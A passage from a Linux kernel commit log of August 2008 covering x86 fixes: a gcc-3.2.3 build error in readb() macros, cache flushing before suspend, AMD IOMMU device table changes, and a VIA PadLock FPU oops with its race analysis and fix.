	Building 2.6.27-rc1 on x86 with gcc-3.2.3 fails with: In file included from include/asm/dma.h:12, from include/linux/bootmem.h:8, from init/main.c:26: include/asm/io.h: In function `readb': include/asm/io.h:32: syntax error before string constant include/asm/io.h: In function `readw': include/asm/io.h:33: syntax error before string constant include/asm/io.h: In function `readl': include/asm/io.h:34: syntax error before string constant include/asm/io.h: In function `__readb': include/asm/io.h:36: syntax error before string constant include/asm/io.h: In function `__readw': include/asm/io.h:37: syntax error before string constant include/asm/io.h: In function `__readl': include/asm/io.h:38: syntax error before string constant make[1]: * [init/main.o] Error 1 make: * [init] Error 2 Starting with 2.6.27-rc1 readb() et al are generated by a build_mmio_read() macro, which generates asm() statements with output register constraints like "=" "q", i.e. as two adjacent string literals. This doesn't work with gcc-3.2.3. Fixed by moving the "=" part into the callers' reg parameter (as suggested by Ingo). Build and boot-tested with gcc-3.2.3 on 32 and 64-bit x86. Fixes <http://bugzilla.kernel.org/show_bug.cgi?id=11205>. Signed-off-by: Mikael Pettersson <mikpe@it.uu.se> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	x86: invalidate caches before going into suspend	Mark Langsdorf
	When a CPU core is shut down, all of its caches need to be flushed to prevent stale data from causing errors if the core is resumed. Current Linux suspend code performs an assignment after the flush, which can add dirty data back to the cache. On some AMD platforms, additional speculative reads have caused crashes on resume because of this dirty data. Relocate the cache flush to be the very last thing done before halting. Tie into an assembly line so the compile will not reorder it. Add some documentation explaining what is going on and why we're doing this. Signed-off-by: Mark Langsdorf <mark.langsdorf@amd.com> Acked-by: Mark Borden <mark.borden@amd.com> Acked-by: Michael Hohmuth <michael.hohmuth@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	Merge branch 'x86/amd-iommu' into x86/urgent	Ingo Molnar

2008-08-15	x86m AMD IOMMU: cleanup: replace LOW_U32 macro with generic lower_32_bits	Joerg Roedel
	Signed-off-by: Joerg Roedel <joerg.roedel@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	x86, AMD IOMMU: initialize device table properly	Joerg Roedel
	This patch adds device table initializations which forbids memory accesses for devices per default and disables all page faults. Signed-off-by: Joerg Roedel <joerg.roedel@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-15	x86, AMD IOMMU: use status bit instead of memory write-back for completion wait	Joerg Roedel
	Signed-off-by: Joerg Roedel <joerg.roedel@amd.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>
2008-08-14	Merge branch 'x86/fpu' into x86/urgent	Ingo Molnar

2008-08-13	crypto: padlock - fix VIA PadLock instruction usage with irq_ts_save/restore()	Suresh Siddha
	Wolfgang Walter reported this oops on his via C3 using padlock for AES-encryption: ################################################################## BUG: unable to handle kernel NULL pointer dereference at 000001f0 IP: [<c01028c5>] __switch_to+0x30/0x117 *pde = 00000000 Oops: 0002 [#1] PREEMPT Modules linked in: Pid: 2071, comm: sleep Not tainted (2.6.26 #11) EIP: 0060:[<c01028c5>] EFLAGS: 00010002 CPU: 0 EIP is at __switch_to+0x30/0x117 EAX: 00000000 EBX: c0493300 ECX: dc48dd00 EDX: c0493300 ESI: dc48dd00 EDI: c0493530 EBP: c04cff8c ESP: c04cff7c DS: 007b ES: 007b FS: 0000 GS: 0033 SS: 0068 Process sleep (pid: 2071, ti=c04ce000 task=dc48dd00 task.ti=d2fe6000) Stack: dc48df30 c0493300 00000000 00000000 d2fe7f44 c03b5b43 c04cffc8 00000046 c0131856 0000005a dc472d3c c0493300 c0493470 d983ae00 00002696 00000000 c0239f54 00000000 c04c4000 c04cffd8 c01025fe c04f3740 00049800 c04cffe0 Call Trace: [<c03b5b43>] ? schedule+0x285/0x2ff [<c0131856>] ? pm_qos_requirement+0x3c/0x53 [<c0239f54>] ? acpi_processor_idle+0x0/0x434 [<c01025fe>] ? cpu_idle+0x73/0x7f [<c03a4dcd>] ? rest_init+0x61/0x63 ======================= Wolfgang also found out that adding kernel_fpu_begin() and kernel_fpu_end() around the padlock instructions fix the oops. Suresh wrote: These padlock instructions though don't use/touch SSE registers, but it behaves similar to other SSE instructions. For example, it might cause DNA faults when cr0.ts is set. While this is a spurious DNA trap, it might cause oops with the recent fpu code changes. This is the code sequence that is probably causing this problem: a) new app is getting exec'd and it is somewhere in between start_thread() and flush_old_exec() in the load_xyz_binary() b) At pont "a", task's fpu state (like TS_USEDFPU, used_math() etc) is cleared. c) Now we get an interrupt/softirq which starts using these encrypt/decrypt routines in the network stack. This generates a math fault (as cr0.ts is '1') which sets TS_USEDFPU and restores the math that is in the task's xstate. d) Return to exec code path, which does start_thread() which does free_thread_xstate() and sets xstate pointer to NULL while the TS_USEDFPU is still set. e) At the next context switch from the new exec'd task to another task, we have a scenarios where TS_USEDFPU is set but xstate pointer is null. This can cause an oops during unlazy_fpu() in __switch_to() Now: 1) This should happen with or with out pre-emption. Viro also encountered similar problem with out CONFIG_PREEMPT. 2) kernel_fpu_begin() and kernel_fpu_end() will fix this problem, because kernel_fpu_begin() will manually do a clts() and won't run in to the situation of setting TS_USEDFPU in step "c" above. 3) This was working before the fpu changes, because its a spurious math fault which doesn't corrupt any fpu/sse registers and the task's math state was always in an allocated state. With out the recent lazy fpu allocation changes, while we don't see oops, there is a possible race still present in older kernels(for example, while kernel is using kernel_fpu_begin() in some optimized clear/copy page and an interrupt/softirq happens which uses these padlock instructions generating DNA fault). This is the failing scenario that existed even before the lazy fpu allocation changes: 0. CPU's TS flag is set 1. kernel using FPU in some optimized copy routine and while doing kernel_fpu_begin() takes an interrupt just before doing clts() 2. Takes an interrupt and ipsec uses padlock instruction. And we take a DNA fault as TS flag is still set. 3. We handle the DNA fault and set TS_USEDFPU and clear cr0.ts 4. We complete the padlock routine 5. Go back to step-1, which resumes clts() in kernel_fpu_begin(), finishes the optimized copy routine and does kernel_fpu_end(). At this point, we have cr0.ts again set to '1' but the task's TS_USEFPU is stilll set and not cleared. 6. Now kernel resumes its user operation. And at the next context switch, kernel sees it has do a FP save as TS_USEDFPU is still set and then will do a unlazy_fpu() in __switch_to(). unlazy_fpu() will take a DNA fault, as cr0.ts is '1' and now, because we are in __switch_to(), math_state_restore() will get confused and will restore the next task's FP state and will save it in prev tasks's FP state. Remember, in __switch_to() we are already on the stack of the next task but take a DNA fault for the prev task. This causes the fpu leakage. Fix the padlock instruction usage by calling them inside the context of new routines irq_ts_save/restore(), which clear/restore cr0.ts manually in the interrupt context. This will not generate spurious DNA in the context of the interrupt which will fix the oops encountered and the possible FPU leakage issue. Reported-and-bisected-by: Wolfgang Walter <wolfgang.walter@stwm.de> Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com> Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
2008-08-13	Merge commit 'v2.6.27-rc3' into x86/urgent	Ingo Molnar

2008-08-13	x86: propagate new nonpanic bootmem macros to CONFIG_HAVE_ARCH_BOOTMEM_NODE	Johannes Weiner
	Commit 74768ed833344b "page allocator: use no-panic variant of alloc_bootmem() in alloc_large_system_hash()" introduced two new _nopanic macros which are undefined for CONFIG_HAVE_ARCH_BOOTMEM_NODE. Signed-off-by: Johannes Weiner <hannes@saeurebad.de> Acked-by: "Jan Beulich" <jbeulich@novell.com> Signed-off-by: Ingo Molnar <mingo@elte.hu>